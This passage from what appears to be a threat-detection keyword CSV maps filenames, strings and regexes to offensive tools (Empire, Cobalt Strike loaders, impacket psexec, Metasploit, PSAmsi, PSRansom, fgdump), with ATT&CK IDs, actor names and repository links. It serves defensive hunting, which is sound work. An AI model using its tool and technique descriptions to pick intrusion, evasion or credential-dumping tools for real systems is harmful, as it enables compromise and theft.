executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*PS2EXE-master*",".{0,1000}PS2EXE\-master.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*PSAmsiClient.ps1*",".{0,1000}PSAmsiClient\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*PSAmsiScanner.ps1*",".{0,1000}PSAmsiScanner\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*PSAttack*",".{0,1000}PSAttack.{0,1000}","offensive_tool_keyword","PSAttack","PS>Attack combines some of the best projects in the infosec powershell community into a self-contained custom PowerShell console. It's designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams.
It does this with in a couple of ways.","T1059 - T1112 - T1055 - T1566","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/jaredhaight/PSAttack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PSByPassCLM*",".{0,1000}PSByPassCLM.{0,1000}","offensive_tool_keyword","PSByPassCLM","Bypass for PowerShell Constrained Language Mode","T1027 - T1059 - T1218 - T1086 - T1089","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/padovah4ck/PSByPassCLM","1","0","N/A","N/A","4","322","48","2021-12-23T16:29:01Z","2018-09-13T07:27:18Z" "*PSCMD channel was either not defined while connecting OR the channel name is not the default.*",".{0,1000}PSCMD\schannel\swas\seither\snot\sdefined\swhile\sconnecting\sOR\sthe\schannel\sname\sis\snot\sthe\sdefault\..{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*pscmd/serverscript.ps1*",".{0,1000}pscmd\/serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*pscmd\serverscript.ps1*",".{0,1000}pscmd\\serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the 
aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*PSconfusion.py*",".{0,1000}PSconfusion\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*pse2john.py*",".{0,1000}pse2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" 
"*ps-empire client*",".{0,1000}ps\-empire\sclient.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*ps-empire server*",".{0,1000}ps\-empire\sserver.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - 
T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*ps-empire*",".{0,1000}ps\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*psexec.py*",".{0,1000}psexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*psexec_ms17_010.rb*",".{0,1000}psexec_ms17_010\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PSEXEC_PSH *",".{0,1000}PSEXEC_PSH\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*-PsExecCmd*",".{0,1000}\-PsExecCmd.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PsExecLiveImplant*",".{0,1000}PsExecLiveImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*PsExecMenu(*",".{0,1000}PsExecMenu\(.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*psinject * x64 Invoke-*",".{0,1000}psinject\s.{0,1000}\sx64\sInvoke\-.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*psinject -PID*",".{0,1000}psinject\s\-PID.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*PSLessExec.exe *",".{0,1000}PSLessExec\.exe\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*pslo *.ps1*",".{0,1000}pslo\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 
- T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*PsMapExec -*",".{0,1000}PsMapExec\s\-.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PsMapExec will continue in the current users context*",".{0,1000}PsMapExec\swill\scontinue\sin\sthe\scurrent\susers\scontext.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PsMapExec.ps1*",".{0,1000}PsMapExec\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PsMapExec-main*",".{0,1000}PsMapExec\-main.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*pSNIRFgTuZnCdHN*",".{0,1000}pSNIRFgTuZnCdHN.{0,1000}","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","0","N/A","10","10","1177","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" "*PSObfucate.py*",".{0,1000}PSObfucate\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*Pspersist-main*",".{0,1000}Pspersist\-main.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - 
T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*PSprofile.cpp*",".{0,1000}PSprofile\.cpp.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*pspy - version: *",".{0,1000}pspy\s\-\sversion\:\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy*psscanner",".{0,1000}pspy.{0,1000}psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy32 -*",".{0,1000}pspy32\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy64 -*",".{0,1000}pspy64\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy64 
-p*",".{0,1000}pspy64\s\-p.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy64 -r *",".{0,1000}pspy64\s\-r\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-build:latest*",".{0,1000}pspy\-build\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-development:latest*",".{0,1000}pspy\-development\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-example:latest*",".{0,1000}pspy\-example\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-master*",".{0,1000}pspy\-master.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" 
"*pspy-testing:latest*",".{0,1000}pspy\-testing\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*PSRansom by @JoelGMSec*",".{0,1000}PSRansom\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*PSRansom.ps1*",".{0,1000}PSRansom\.ps1.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*PSRecon*",".{0,1000}PSRecon.{0,1000}","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. 
or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/gfoss/PSRecon","1","1","N/A","N/A","5","472","107","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z" "*psreflect *",".{0,1000}psreflect\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*PSRunspace-InvokeRun-certutilCoded.txt*",".{0,1000}PSRunspace\-InvokeRun\-certutilCoded\.txt.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*pstgdump.exe*",".{0,1000}pstgdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 